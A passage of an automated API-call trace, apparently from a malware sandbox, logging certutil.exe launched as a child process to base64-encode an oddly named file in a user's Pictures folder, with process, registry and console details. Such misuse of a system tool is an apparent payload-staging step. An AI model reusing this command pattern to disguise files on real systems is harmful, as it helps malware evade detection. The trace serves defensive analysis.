0x1 [0288.273] LocalFree (hMem=0x1c0ed1eba60) returned 0x0 [0288.273] LocalFree (hMem=0x1c0ed1e2100) returned 0x0 [0288.273] LocalFree (hMem=0x1c0ed201170) returned 0x0 [0288.273] LocalFree (hMem=0x1c0ed201650) returned 0x0 [0288.273] LocalFree (hMem=0x1c0ed1d8b80) returned 0x0 [0288.273] LocalFree (hMem=0x1c0ed201740) returned 0x0 [0288.273] LocalFree (hMem=0x1c0ed1e4090) returned 0x0 [0288.273] LocalFree (hMem=0x1c0ed1e1e60) returned 0x0 [0288.273] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0288.273] GetLastError () returned 0x7e [0288.274] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0288.274] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0288.274] DllMain () returned 0x1 [0288.274] exit (_Code=0) Thread: id = 110 os_tid = 0x1318 Process: id = "42" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x8539000" os_pid = "0x11ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"4f lywQbc0ZJ_8b.gif.Sister\" \"4f lywQbc0ZJ_8b.gif.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Pictures\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 111 os_tid = 0x71c [0294.708] GetStartupInfoW (in: lpStartupInfo=0xa899dffe70 | out: lpStartupInfo=0xa899dffe70*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"4f lywQbc0ZJ_8b.gif.Sister\" \"4f lywQbc0ZJ_8b.gif.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0294.709] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0294.709] __set_app_type (_Type=0x1) [0294.709] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0294.710] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0294.713] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0294.713] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0294.714] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0294.714] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0294.714] WerSetFlags () returned 0x0 [0294.714] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0294.714] __iob_func () returned 0x7ffcea2dea00 [0294.714] _fileno (_File=0x7ffcea2dea30) returned 1 [0294.715] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0294.715] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0294.717] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0294.717] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0294.717] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0294.717] GetConsoleOutputCP () returned 0x1b5 [0294.718] _vsnwprintf (in: _Buffer=0xa899dffde0, _BufferCount=0xb, _Format=".%d", _ArgList=0xa899dffd08 | out: _Buffer=".437") returned 4 [0294.718] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0294.718] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.718] GetFileType (hFile=0x50) returned 0x2 [0294.718] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0294.719] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0294.719] SetThreadUILanguage (LangId=0x0) returned 0x409 [0294.719] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0294.719] GetCommandLineW () returned="certutil -encode \"4f lywQbc0ZJ_8b.gif.Sister\" \"4f lywQbc0ZJ_8b.gif.Cruel\"" [0294.719] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2620e32b3d0 [0294.720] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2620e323730 [0294.720] LocalFree (hMem=0x2620e32b3d0) returned 0x0 [0294.720] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2620e31a000 [0294.720] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x2620e323fd0 [0294.720] LocalFree (hMem=0x2620e31a000) returned 0x0 [0294.720] LocalFree (hMem=0x2620e323730) returned 0x0 [0294.720] LocalFree (hMem=0x0) returned 0x0 [0294.720] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0294.720] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0294.721] GetCommandLineW () returned="certutil -encode \"4f lywQbc0ZJ_8b.gif.Sister\" \"4f lywQbc0ZJ_8b.gif.Cruel\"" [0294.721] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2620e32b3f0 [0294.721] GetSystemTime (in: lpSystemTime=0xa899dffad0 | out: lpSystemTime=0xa899dffad0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x32, wSecond=0x9, wMilliseconds=0x106)) [0294.721] SystemTimeToFileTime (in: lpSystemTime=0xa899dffad0, lpFileTime=0xa899dffac8 | out: lpFileTime=0xa899dffac8) returned 1 [0294.722] FileTimeToLocalFileTime (in: lpFileTime=0xa899dffac8, lpLocalFileTime=0xa899dffa90 | out: lpLocalFileTime=0xa899dffa90) returned 1 [0294.722] FileTimeToSystemTime (in: lpFileTime=0xa899dffa90, lpSystemTime=0xa899dff800 | out: lpSystemTime=0xa899dff800) returned 1 [0294.722] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xa899dff800, lpFormat=0x0, lpDateStr=0xa899dff910, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0294.722] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xa899dff800, lpFormat=0x0, lpTimeStr=0xa899dff810, cchTime=128 | out: lpTimeStr="8:50 PM") returned 8 [0294.722] _vsnwprintf (in: _Buffer=0xa899dff81e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xa899dff7e8 | out: _Buffer=" 09.262s") returned 8 [0294.722] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x2620e32dc70 [0294.722] SetLastError (dwErrCode=0x80070716) [0294.722] _vsnwprintf (in: _Buffer=0xa899dff898, _BufferCount=0xb, _Format="%d", _ArgList=0xa899dff888 | out: _Buffer="948") returned 3 [0294.722] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xa899dff650, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0294.723] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2620e32b8f0 [0294.723] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x2620e321d00 [0294.723] LocalFree (hMem=0x2620e32dc70) returned 0x0 [0294.723] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xa899dffb40 | out: lpSystemTimeAsFileTime=0xa899dffb40*(dwLowDateTime=0xda4706fc, dwHighDateTime=0x1d6141f)) [0294.723] GetLocalTime (in: lpSystemTime=0xa899dffb78 | out: lpSystemTime=0xa899dffb78*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x32, wSecond=0x9, wMilliseconds=0x107)) [0294.723] SystemTimeToFileTime (in: lpSystemTime=0xa899dffb78, lpFileTime=0xa899dffb50 | out: lpFileTime=0xa899dffb50) returned 1 [0294.723] CompareFileTime (lpFileTime1=0xa899dffb50, lpFileTime2=0xa899dffb40) returned 1 [0294.723] _vsnwprintf (in: _Buffer=0xa899dffb88, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xa899dffb18 | out: _Buffer="GMT + 2.00") returned 10 [0294.723] LocalFree (hMem=0x2620e32b3f0) returned 0x0 [0294.724] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0294.724] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0294.724] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0294.724] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0294.724] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0294.724] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xa899dffbb8 | out: _Buffer="10.0.15063.447") returned 14 [0294.724] GetACP () returned 0x4e4 [0294.724] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0294.724] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2620e32b5f0 [0294.724] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2620e32b5f0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0294.724] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2620e32e330 [0294.724] _vsnwprintf (in: _Buffer=0x2620e32e330, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xa899dffc08 | out: _Buffer="10.0.15063.447 retail") returned 21 [0294.724] LocalFree (hMem=0x2620e32b5f0) returned 0x0 [0294.724] LocalFree (hMem=0x0) returned 0x0 [0294.724] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0294.724] GetACP () returned 0x4e4 [0294.724] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0294.724] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2620e32b670 [0294.724] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2620e32b670, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0294.725] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2620e32dcb0 [0294.725] _vsnwprintf (in: _Buffer=0x2620e32dcb0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xa899dffc08 | out: _Buffer="10.0.15063.447 retail") returned 21 [0294.725] LocalFree (hMem=0x2620e32b670) returned 0x0 [0294.725] LocalFree (hMem=0x0) returned 0x0 [0294.725] GetACP () returned 0x4e4 [0294.725] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0294.725] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2620e32b470 [0294.725] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2620e32b470, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0294.725] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2620e32e370 [0294.725] _vsnwprintf (in: _Buffer=0x2620e32e370, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xa899dffc38 | out: _Buffer="10.0.15063.447 retailEAUT") returned 21 [0294.725] LocalFree (hMem=0x2620e32b470) returned 0x0 [0294.725] LocalFree (hMem=0x2620e32e330) returned 0x0 [0294.725] LocalFree (hMem=0x2620e32dcb0) returned 0x0 [0294.725] LocalFree (hMem=0x2620e32e370) returned 0x0 [0294.725] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0294.725] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0294.726] GetStockObject (i=0) returned 0x900010 [0294.726] RegisterClassW (lpWndClass=0xa899dffd60) returned 0xc1a2 [0294.726] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1402c6 [0294.748] NtdllDefWindowProc_W () returned 0x0 [0294.749] NtdllDefWindowProc_W () returned 0x1 [0294.757] NtdllDefWindowProc_W () returned 0x0 [0294.767] UpdateWindow (hWnd=0x1402c6) returned 1 [0294.768] PostMessageW (hWnd=0x1402c6, Msg=0x400, wParam=0x0, lParam=0x2620e31217e) returned 1 [0294.768] GetMessageW (in: lpMsg=0xa899dffdb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xa899dffdb0) returned 1 [0294.768] TranslateMessage (lpMsg=0xa899dffdb0) returned 0 [0294.768] DispatchMessageW (lpMsg=0xa899dffdb0) returned 0x0 [0294.768] NtdllDefWindowProc_W () returned 0x0 [0294.768] GetMessageW (in: lpMsg=0xa899dffdb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xa899dffdb0) returned 1 [0294.768] TranslateMessage (lpMsg=0xa899dffdb0) returned 0 [0294.768] DispatchMessageW (lpMsg=0xa899dffdb0) returned 0x0 [0294.768] LocalAlloc (uFlags=0x0, uBytes=0x82) returned 0x2620e314420 [0294.768] LocalAlloc (uFlags=0x0, uBytes=0x96) returned 0x2620e319170 [0294.768] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0294.768] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0294.769] SetLastError (dwErrCode=0x80070716) [0294.769] _vsnwprintf (in: _Buffer=0xa899dff7b8, _BufferCount=0xb, _Format="%d", _ArgList=0xa899dff7a8 | out: _Buffer="465") returned 3 [0294.769] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xa899dff570, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0294.769] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2620e324150 [0294.769] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0294.769] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0294.769] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xa899dff550, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0294.769] GetLastError () returned 0xcb [0294.769] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0294.769] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0294.769] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0294.769] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0294.770] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0294.770] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0294.770] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0294.770] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0294.770] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0294.770] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0294.770] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0294.770] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0294.770] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0294.770] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0294.770] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0294.770] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0294.770] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0294.770] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0294.770] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0294.770] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0294.770] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0294.770] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xa899dff218 | out: phkResult=0xa899dff218*=0x23c) returned 0x0 [0294.770] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x2620e319360 [0294.770] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xa899dff788, lpData=0xa899dff7b8, lpcbData=0xa899dff780*=0x4 | out: lpType=0xa899dff788*=0x0, lpData=0xa899dff7b8*=0x0, lpcbData=0xa899dff780*=0x4) returned 0x2 [0294.770] LocalFree (hMem=0x2620e319360) returned 0x0 [0294.771] RegCloseKey (hKey=0x23c) returned 0x0 [0294.771] LocalFree (hMem=0x0) returned 0x0 [0294.771] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x2620e33ae40 [0294.786] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0294.786] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0294.786] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0294.786] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0294.787] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0294.787] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0294.787] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0294.787] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0294.787] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0294.787] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0294.787] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0294.787] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0294.787] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0294.787] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0294.787] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0294.787] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0294.787] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x2620e340720 [0294.787] GetComputerNameW (in: lpBuffer=0x2620e340720, nSize=0xa899dff780 | out: lpBuffer="NQDPDE", nSize=0xa899dff780) returned 1 [0294.788] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xa899dff750 | out: lpBuffer=0x0, nSize=0xa899dff750) returned 0 [0294.788] GetLastError () returned 0xea [0294.788] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2620e32b310 [0294.788] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x2620e32b310, nSize=0xa899dff750 | out: lpBuffer="NQdPdE", nSize=0xa899dff750) returned 1 [0294.788] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0294.791] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x2620e340790, cbCertEncoded=0x8743) returned 0x0 [0294.795] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x2620e340790, cbCrlEncoded=0x8743) returned 0x0 [0294.795] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x2620e340790, cbEncoded=0x8743, dwFlags=0x8000, pDecodePara=0xa899dff630, pvStructInfo=0xa899dff6c0, pcbStructInfo=0xa899dff6b4 | out: pvStructInfo=0xa899dff6c0, pcbStructInfo=0xa899dff6b4) returned 0 [0294.796] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x2620e340790, cbEncoded=0x8743, dwFlags=0x8000, pDecodePara=0xa899dff630, pvStructInfo=0xa899dff6c0, pcbStructInfo=0xa899dff6b4 | out: pvStructInfo=0xa899dff6c0, pcbStructInfo=0xa899dff6b4) returned 0 [0294.796] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x2620e340790, cbEncoded=0x8743, dwFlags=0x8000, pDecodePara=0xa899dff630, pvStructInfo=0xa899dff6c0, pcbStructInfo=0xa899dff6b4 | out: pvStructInfo=0xa899dff6c0, pcbStructInfo=0xa899dff6b4) returned 0 [0294.796] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x2620e3254f0 [0294.809] CryptMsgUpdate (hCryptMsg=0x2620e3254f0, pbData=0x2620e340790, cbData=0x8743, fFinal=1) returned 0 [0294.809] GetLastError () returned 0x8009310b [0294.809] CryptMsgClose (hCryptMsg=0x2620e3254f0) returned 1 [0294.810] GetFileAttributesExW (in: lpFileName="4f lywQbc0ZJ_8b.gif.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\4f lywqbc0zj_8b.gif.sister"), fInfoLevelId=0x0, lpFileInformation=0xa899dff6e0 | out: lpFileInformation=0xa899dff6e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x685ef6e0, ftCreationTime.dwHighDateTime=0x1d5eb76, ftLastAccessTime.dwLowDateTime=0x93013f0, ftLastAccessTime.dwHighDateTime=0x1d5e957, ftLastWriteTime.dwLowDateTime=0x93013f0, ftLastWriteTime.dwHighDateTime=0x1d5e957, nFileSizeHigh=0x0, nFileSizeLow=0x8743)) returned 1 [0294.810] _vsnwprintf (in: _Buffer=0xa899dff6e8, _BufferCount=0xb, _Format="%d", _ArgList=0xa899dff6d8 | out: _Buffer="359") returned 3 [0294.810] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xa899dff4a0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0294.810] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2620e340270 [0294.810] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.810] _vsnwprintf (in: _Buffer=0xa899dfe6d0, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xa899dff728 | out: _Buffer="Input Length = 34627") returned 20 [0294.810] GetFileType (hFile=0x50) returned 0x2 [0294.810] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa899dfe6d0*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xa899dfe684, lpReserved=0x0 | out: lpBuffer=0xa899dfe6d0*, lpNumberOfCharsWritten=0xa899dfe684*=0x14) returned 1 [0294.812] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.812] _vsnwprintf (in: _Buffer=0xa899dfe6d0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xa899dff728 | out: _Buffer="\n") returned 1 [0294.812] GetFileType (hFile=0x50) returned 0x2 [0294.812] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa899dfe6d0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xa899dfe684, lpReserved=0x0 | out: lpBuffer=0xa899dfe6d0*, lpNumberOfCharsWritten=0xa899dfe684*=0x1) returned 1 [0294.834] GetFileAttributesExW (in: lpFileName="4f lywQbc0ZJ_8b.gif.Cruel" (normalized: "c:\\users\\fd1hvy\\pictures\\4f lywqbc0zj_8b.gif.cruel"), fInfoLevelId=0x0, lpFileInformation=0xa899dff6e0 | out: lpFileInformation=0xa899dff6e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda554e7d, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xda554e7d, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xda57dcc4, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0xba38)) returned 1 [0294.834] _vsnwprintf (in: _Buffer=0xa899dff6e8, _BufferCount=0xb, _Format="%d", _ArgList=0xa899dff6d8 | out: _Buffer="361") returned 3 [0294.834] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xa899dff4a0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0294.834] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x2620e340570 [0294.834] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.835] _vsnwprintf (in: _Buffer=0xa899dfe6d0, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xa899dff728 | out: _Buffer="Output Length = 47672") returned 21 [0294.835] GetFileType (hFile=0x50) returned 0x2 [0294.835] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa899dfe6d0*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0xa899dfe684, lpReserved=0x0 | out: lpBuffer=0xa899dfe6d0*, lpNumberOfCharsWritten=0xa899dfe684*=0x15) returned 1 [0294.837] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.837] _vsnwprintf (in: _Buffer=0xa899dfe6d0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xa899dff728 | out: _Buffer="\n") returned 1 [0294.837] GetFileType (hFile=0x50) returned 0x2 [0294.837] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa899dfe6d0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xa899dfe684, lpReserved=0x0 | out: lpBuffer=0xa899dfe6d0*, lpNumberOfCharsWritten=0xa899dfe684*=0x1) returned 1 [0294.864] LocalFree (hMem=0x2620e340790) returned 0x0 [0294.864] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0294.864] _vsnwprintf (in: _Buffer=0xa899dff748, _BufferCount=0xb, _Format="%d", _ArgList=0xa899dff738 | out: _Buffer="2022") returned 4 [0294.864] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xa899dff500, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0294.865] LocalAlloc 